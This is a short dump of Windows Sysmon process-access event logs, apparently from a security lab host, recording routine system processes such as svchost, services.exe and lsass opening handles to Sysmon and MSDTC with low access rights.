{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.296\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.296","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:47.359\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-0010947F0500}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:47.359","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-0010947F0500}","TargetProcessId":"804","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
